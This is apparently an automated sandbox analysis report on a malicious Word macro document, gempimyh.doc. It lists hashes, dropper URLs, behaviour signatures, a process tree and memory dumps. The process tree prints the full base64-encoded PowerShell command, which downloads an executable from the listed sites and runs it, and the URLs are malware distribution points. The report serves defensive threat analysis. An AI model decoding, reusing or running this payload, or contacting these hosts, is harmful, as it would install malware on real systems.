Analysis

  • max time kernel
    149s
  • max time network
    168s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    22-05-2022 05:26

General

  • Target

    gempimyh.doc

  • Size

    231KB

  • MD5

    e8c455b9d0a528d8e47a5fa5c949e368

  • SHA1

    9fb22350f11a28bf1522fd79c0a94268efee4b22

  • SHA256

    4c3f9a91ab8bd67a7de8b61f6d5e49c34a0c3ded123f63205f02d17ff570c204

  • SHA512

    c4de4a1b0f2d8b239a5366c922bd400a525dfcc4158442310d5602467ef184d362de16b6ea84756c1f48c7fde65fc520ae3edd8798a1c05daaacff2ae28fefdd

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://xn--ruqumz1h0h.com/wp-content/zj/

exe.dropper

http://hemalrathod.com/BillGST/6Y/

exe.dropper

http://ipeconstrutora.com/cgi-bin/Zf/

exe.dropper

http://islamabadtrafficpolice.gov.pk/i/

exe.dropper

http://kogeisha.net/kansaiosakanagasaki-kenjinkai/Rxj/

exe.dropper

http://lalenga.cl/claudio/oMz/

exe.dropper

http://pedantas.eu/wp-snapshots/L/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 9 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\gempimyh.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1972
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1104
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABPADkAMQAzADkAeQA3AD0AKAAnAFUAJwArACgAJwBpACcAKwAnAG4AaQAnACsAJwB6AG0AZAAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAEUATgBWADoAdQBTAEUAcgBQAFIAbwBmAGkAbABFAFwAaAB1AFoAQwAwAF8AeQBcAEkAVAB2AEMAMwBuAGQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAFIAZQBjAFQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBjAHUAYABSAEkAVABZAFAAUgBvAHQATwBgAGMAYABPAEwAIgAgAD0AIAAoACgAJwB0AGwAJwArACcAcwAnACkAKwAnADEAJwArACgAJwAyACwAJwArACcAIAAnACkAKwAoACcAdABsAHMAMQAxACcAKwAnACwAJwApACsAKAAnACAAdAAnACsAJwBsAHMAJwApACkAOwAkAE8AYQA4AGwAbgB6AHgAIAA9ACAAKAAnAFIAMQAnACsAKAAnAGoAJwArACcAcgBwADgAJwApACkAOwAkAEwAZQByAGgAcAA1AGMAPQAoACcARgAnACsAKAAnADkAdQAnACsAJwAxACcAKQArACgAJwBwACcAKwAnADAANgAnACkAKQA7ACQASwA0AG0AdAAwAHAAZQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnAFEAUwA4AEgAdQAnACsAJwB6AGMAMAAnACsAJwBfACcAKQArACcAeQAnACsAJwBRAFMAJwArACgAJwA4AEkAdAB2AGMAJwArACcAMwAnACsAJwBuACcAKQArACcAZABRACcAKwAnAFMAOAAnACkALgAiAFIAYABlAGAAUABsAGEAYwBFACIAKAAoACcAUQAnACsAJwBTADgAJwApACwAJwBcACcAKQApACsAJABPAGEAOABsAG4AegB4ACsAKAAnAC4AJwArACgAJwBlAHgAJwArACcAZQAnACkAKQA7ACQAUAB6AHEAawAxAHgAcAA9ACgAJwBaAHAAJwArACcAcQAnACsAKAAnAG4AYwBkACcAKwAnAHcAJwApACkAOwAkAE0AdAByAGUAdQBrAGgAPQAuACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAJwArACcAYwB0ACcAKQAgAE4ARQB0AC4AdwBFAGIAYwBMAEkAZQBOAHQAOwAkAFIAOABqADkAagB3AHkAPQAoACgAJwBoAHQAdAAnACsAJwBwADoAJwApACsAKAAnAC8ALwB4ACcAKwAnAG4AJwApACsAKAAnAC0AJwArACcALQByAHUAcQAnACsAJwB1AG0AJwApACsAKAAnAHoAMQBoADAAaAAnACsAJwAuACcAKwAnAGMAbwAnACkAKwAnAG0ALwAnACsAKAAnAHcAJwArACcAcAAtACcAKQArACgAJwBjAG8AJwArACcAbgB0ACcAKQArACcAZQAnACsAKAAnAG4AdAAvACcAKwAnAHoAJwApACsAJwBqACcAKwAoACcALwAnACsAJwAqAGgAJwApACsAKAAnAHQAdAAnACsAJwBwACcAKQArACcAOgAnACsAKAAnAC8ALwAnACsAJwBoAGUAbQBhAGwAJwApACsAJwByAGEAJwArACgAJwB0AGgAbwBkACcAKwAnAC4AYwBvACcAKQArACgAJwBtAC8AQgAnACsAJwBpACcAKQArACcAbABsACcAKwAoACcARwBTAFQALwAnACsAJwA2AFkAJwApACsAJwAvACoAJwArACgAJwBoAHQAJwArACcAdABwADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwBpACcAKwAnAHAAZQBjAG8AbgBzAHQAJwApACsAKAAnAHIAJwArACcAdQB0ACcAKQArACcAbwByACcAKwAoACcAYQAnACsAJwAuAGMAbwBtACcAKQArACcALwBjACcAKwAnAGcAJwArACcAaQAnACsAJwAtACcAKwAoACcAYgAnACsAJwBpAG4ALwBaAGYAJwApACsAKAAnAC8AKgBoACcAKwAnAHQAdAAnACkAKwAnAHAAJwArACcAOgAnACsAKAAnAC8AJwArACcALwBpACcAKQArACcAcwBsACcAKwAoACcAYQBtAGEAYgBhAGQAdAAnACsAJwByACcAKwAnAGEAZgAnACkAKwAoACcAZgBpAGMAJwArACcAcABvACcAKQArACcAbABpACcAKwAoACcAYwBlAC4AJwArACcAZwBvAHYAJwApACsAJwAuAHAAJwArACcAawAnACsAJwAvACcAKwAoACcAaQAvACoAaAB0AHQAcAA6AC8AJwArACcALwBrACcAKwAnAG8AJwArACcAZwBlACcAKQArACgAJwBpAHMAJwArACcAaABhAC4AJwArACcAbgBlACcAKwAnAHQALwBrACcAKQArACcAYQBuACcAKwAoACcAcwBhAGkAbwBzACcAKwAnAGEAJwApACsAKAAnAGsAYQBuAGEAZwBhACcAKwAnAHMAJwApACsAKAAnAGEAJwArACcAawBpAC0AJwArACcAawBlAG4AagBpAG4AJwApACsAKAAnAGsAYQBpAC8AJwArACcAUgB4ACcAKQArACcAagAnACsAJwAvACoAJwArACcAaAB0ACcAKwAoACcAdABwADoALwAnACsAJwAvACcAKwAnAGwAYQAnACsAJwBsAGUAbgAnACkAKwAoACcAZwBhAC4AYwAnACsAJwBsACcAKwAnAC8AYwBsACcAKwAnAGEAdQBkAGkAJwArACcAbwAvAG8AJwApACsAJwBNACcAKwAoACcAegAnACsAJwAvACoAaAAnACkAKwAnAHQAJwArACcAdABwACcAKwAoACcAOgAnACsAJwAvAC8AcABlACcAKwAnAGQAYQBuAHQAYQBzACcAKwAnAC4AZQB1ACcAKQArACgAJwAvAHcAJwArACcAcAAnACkAKwAoACcALQBzACcAKwAnAG4AJwApACsAJwBhACcAKwAoACcAcABzAGgAJwArACcAbwB0ACcAKwAnAHMAJwApACsAKAAnAC8ATAAnACsAJwAvACcAKQApAC4AIgBTAHAAYABsAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFIAbgBrAHgAcgByAHEAPQAoACcAUwBfACcAKwAoACcAZgBrAGYAJwArACcAeAB6ACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAVgBsADAAdQBiAGUAMAAgAGkAbgAgACQAUgA4AGoAOQBqAHcAeQApAHsAdAByAHkAewAkAE0AdAByAGUAdQBrAGgALgAiAGQATwBXAE4ATABvAGAAQQBgAGQARgBpAEwAZQAiACgAJABWAGwAMAB1AGIAZQAwACwAIAAkAEsANABtAHQAMABwAGUAKQA7ACQAVgBwAHkANAAwAHgANQA9ACgAKAAnAFMAbAAnACsAJwBoACcAKQArACgAJwBhAG8AegAnACsAJwBoACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEsANABtAHQAMABwAGUAKQAuACIAbABgAGUAbgBnAGAAVABoACIAIAAtAGcAZQAgADIAMgA0ADUANAApACAAewAuACgAJwBJAG4AdgBvAGsAZQAtACcAKwAnAEkAJwArACcAdABlAG0AJwApACgAJABLADQAbQB0ADAAcABlACkAOwAkAFAAYwBiAHoAaQA1AGUAPQAoACcAQgAnACsAKAAnAHUAMgBzACcAKwAnAGYAJwApACsAJwBhAG4AJwApADsAYgByAGUAYQBrADsAJABHAHUAeABxADQAYQBiAD0AKAAoACcATQA5ACcAKwAnAGcAJwApACsAJwBqACcAKwAoACcAcQAnACsAJwBhAGIAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAMAB1AHUAeABzAHcAPQAoACcATgAnACsAKAAnAHYAJwArACcAOABjAGQAJwApACsAJwBsAHUAJwApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1760

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1104-86-0x0000000000000000-mapping.dmp
    • memory/1760-81-0x000007FEFC5C1000-0x000007FEFC5C3000-memory.dmp
      Filesize

      8KB

    • memory/1760-85-0x000000000296B000-0x000000000298A000-memory.dmp
      Filesize

      124KB

    • memory/1760-84-0x000000001B750000-0x000000001BA4F000-memory.dmp
      Filesize

      3.0MB

    • memory/1760-82-0x000007FEF3F00000-0x000007FEF4A5D000-memory.dmp
      Filesize

      11.4MB

    • memory/1760-83-0x0000000002964000-0x0000000002967000-memory.dmp
      Filesize

      12KB

    • memory/1972-70-0x000000000056E000-0x0000000000571000-memory.dmp
      Filesize

      12KB

    • memory/1972-75-0x000000000056E000-0x0000000000571000-memory.dmp
      Filesize

      12KB

    • memory/1972-62-0x000000000056E000-0x0000000000571000-memory.dmp
      Filesize

      12KB

    • memory/1972-64-0x000000000056E000-0x0000000000571000-memory.dmp
      Filesize

      12KB

    • memory/1972-63-0x000000000056E000-0x0000000000571000-memory.dmp
      Filesize

      12KB

    • memory/1972-65-0x000000000056E000-0x0000000000571000-memory.dmp
      Filesize

      12KB

    • memory/1972-66-0x000000000056E000-0x0000000000571000-memory.dmp
      Filesize

      12KB

    • memory/1972-67-0x000000000056E000-0x0000000000571000-memory.dmp
      Filesize

      12KB

    • memory/1972-68-0x000000000056E000-0x0000000000571000-memory.dmp
      Filesize

      12KB

    • memory/1972-69-0x000000000056E000-0x0000000000571000-memory.dmp
      Filesize

      12KB

    • memory/1972-54-0x0000000072F11000-0x0000000072F14000-memory.dmp
      Filesize

      12KB

    • memory/1972-71-0x000000000056E000-0x0000000000571000-memory.dmp
      Filesize

      12KB

    • memory/1972-72-0x000000000056E000-0x0000000000571000-memory.dmp
      Filesize

      12KB

    • memory/1972-61-0x000000000056E000-0x0000000000571000-memory.dmp
      Filesize

      12KB

    • memory/1972-76-0x000000000056E000-0x0000000000571000-memory.dmp
      Filesize

      12KB

    • memory/1972-74-0x000000000056E000-0x0000000000571000-memory.dmp
      Filesize

      12KB

    • memory/1972-73-0x000000000056E000-0x0000000000571000-memory.dmp
      Filesize

      12KB

    • memory/1972-77-0x000000000056E000-0x0000000000571000-memory.dmp
      Filesize

      12KB

    • memory/1972-78-0x000000000056E000-0x0000000000571000-memory.dmp
      Filesize

      12KB

    • memory/1972-79-0x000000000056E000-0x0000000000571000-memory.dmp
      Filesize

      12KB

    • memory/1972-80-0x000000000056E000-0x0000000000571000-memory.dmp
      Filesize

      12KB

    • memory/1972-60-0x000000000056E000-0x0000000000571000-memory.dmp
      Filesize

      12KB

    • memory/1972-59-0x000000000056E000-0x0000000000571000-memory.dmp
      Filesize

      12KB

    • memory/1972-58-0x000000007197D000-0x0000000071988000-memory.dmp
      Filesize

      44KB

    • memory/1972-57-0x0000000076C81000-0x0000000076C83000-memory.dmp
      Filesize

      8KB

    • memory/1972-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1972-55-0x0000000070991000-0x0000000070993000-memory.dmp
      Filesize

      8KB

    • memory/1972-88-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB